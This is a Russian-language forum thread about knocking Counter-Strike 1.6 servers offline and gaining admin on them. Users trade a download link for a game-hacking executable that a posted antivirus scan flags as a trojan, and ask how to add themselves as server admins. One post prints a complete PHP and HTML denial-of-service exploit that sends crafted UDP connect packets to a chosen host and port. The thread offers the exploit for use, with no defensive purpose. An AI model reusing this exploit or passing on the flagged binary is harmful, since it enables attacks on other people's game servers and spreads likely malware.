Как для чего? вот бывает такое что один за одним хэд шот...а тут тя раз и модер какой нить банит... ЗЫ не поверите...немогу найти exe'шник...посеял...если у кого остался...очень прошу поделиться...фаловый хост любой подойдёт...
http://anonymous.h17.ru/CSHack.exe По этому линку немогу скачать... Если у кого есть возможность залить\перезалить...буду благодарен...
Вопрос а есть какой-нибудь метод полу4ить админские права на серваке? Такой путь cstrike\addons\amxmodx\configs\users.ini. Там можно добавить админа. Кроме трояна и др. Есть соображения по этому поводу?))
это случайно не с красненькой иконкой, который коннектится вначале под ником Born to be pig... ? и только со второго раза кладёт сервак?
На сколько я понимаю, сплойты и экзешник валят Nosteam сервера, а для Steam есть какой-нить сплойт или экзешник?
Попробуй тут скачать: >>DownLoad<< Ещё нашёл сплоит... 1я часть: Code: <html> <head> <title>PHP Counter Strike DOS Poc</title> <style type="text/css"> input { width: 150px; } td { font-size: 12px; font-family: Verdana, "Trebuchet MS"; text-align: left; } span.err { color: red; } span.ok { color: green; } </style> </head> <body onload="checkpass()"> <div style="width: 210px; margin: auto;"> <form name="csform" method="post" action="cs.php"> <table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;"> <tr> <td style="width: 50px;">Host</td> <td colspan="2"><input name="host" type="text" value=""/></td> </tr> <tr> <td>Port</td> <td colspan="2"><input name="port" type="text" value=""/></td> </tr> <tr> <td> </td> <td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td> <td>Auth Type 2</td> </tr> <tr> <td>Pass</td> <td colspan="2"><input name="pass" type="text" value="" /></td> </tr> <tr> <td> </td> <td colspan="2"><input type="submit" Value="Run"/></td> </tr> </table> <br/> </form> </div> <center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br> </body> </html> 2я часть PHP: <?php /* CS-dos exploit made by gemaglabin Bug was discovered by .FUF # 111596 Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su underwater.cup.su */ ini_set("display_errors","0"); function HELLO_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "TSource Engine Query"; $packet .= pack("H*","00"); return $packet; } function CHALLENGE_PACKET() { $packet = pack("H*","FFFFFFFF"); $packet .= "getchallenge valve"; $packet .= pack("H*","00"); return $packet; } function LOGIN_PACKET_4() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "'; $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod'; $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","220A0000EE02"); return $packet; } function LOGIN_PACKET_2() { global $cookie; global $password; $packet = pack("H*","FFFFFFFF"); $packet .= "connect 47 "; $packet .= $cookie.' "'; $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott'; $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam'; $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass'; $packet .= 'word\\'.$password; $packet .= pack("H*","22"); return $packet; } function dowork($host,$port,$password,$auth) { global $password; global $cookie; # connecting to target host $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2); if (!$fsock) die ($errstr); else { # sending hello packet fwrite ($fsock,HELLO_PACKET()); fread ($fsock,100); # sending chalennge packet fwrite ($fsock,CHALLENGE_PACKET()); # recieving cookies $resp = fread($fsock,100); # grab cookies from packet $cookie = substr($resp,strpos($resp,"A00000000")+10); $cookie = substr($cookie,0,strpos($cookie," ")); # sending login packet if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2()); $resp = fread($fsock,100); } } IF (isset($_POST['host']) && isset($_POST['port'])) { IF (empty($_POST['pass'])) $password = "123"; else $password = $_POST['pass']; $fserver = $_POST['host']; $fport = $_POST['port']; if (isset($_POST['auth'])) $fauth = true;else $fauth=false; # we have to connect 2 times $result = dowork($fserver,$fport,$password,$fauth); $result = dowork($fserver,$fport,$password,$fauth); # parsing result echo "Exploit Sent"; } ?>
Хм... я всего лишь выцепил её из Гугля, НОД, Каспер и DrWeb молчали... хотя что ты хочешь ожидать от такой проги то) Code: Антивирус Версия Обновление Результат AhnLab-V3 2008.2.4.10 2008.02.04 - AntiVir 7.6.0.62 2008.02.04 TR/Agent.act.2 Authentium 4.93.8 2008.02.04 - Avast 4.7.1098.0 2008.02.03 Win32:Agent-PJA AVG 7.5.0.516 2008.02.04 Generic6.WSG BitDefender 7.2 2008.02.04 Trojan.Generic.15882 CAT-QuickHeal 9.00 2008.02.04 - ClamAV 0.92 2008.02.04 - DrWeb 4.44.0.09170 2008.02.04 - eSafe 7.0.15.0 2008.01.28 suspicious Trojan/Worm eTrust-Vet 31.3.5509 2008.02.04 - Ewido 4.0 2008.02.04 - FileAdvisor 1 2008.02.04 High threat detected Fortinet 3.14.0.0 2008.02.04 Grayware F-Prot 4.4.2.54 2008.02.03 - F-Secure 6.70.13260.0 2008.02.04 - Ikarus T3.1.1.20 2008.02.04 Trojan.Win32.Agent.act Kaspersky 7.0.0.125 2008.02.04 - McAfee 5222 2008.02.04 - Microsoft 1.3204 2008.02.04 - NOD32v2 2847 2008.02.04 - Norman 5.80.02 2008.02.04 - Panda 9.0.0.4 2008.02.04 Trj/Downloader.MDW Prevx1 V2 2008.02.04 Generic.Malware Rising 20.29.22.00 2008.01.30 - Sophos 4.26.0 2008.02.04 Mal/Generic-A Sunbelt 2.2.907.0 2008.02.02 - Symantec 10 2008.02.04 Trojan Horse TheHacker 6.2.9.208 2008.02.04 - VBA32 3.12.6.0 2008.02.03 Trojan.Win32.Agent.act VirusBuster 4.3.26:9 2008.02.04 - Webwasher-Gateway 6.6.2 2008.02.04 Trojan.Agent.act.2 p.s. А скрин то я с этого exe делал... ну да ладно)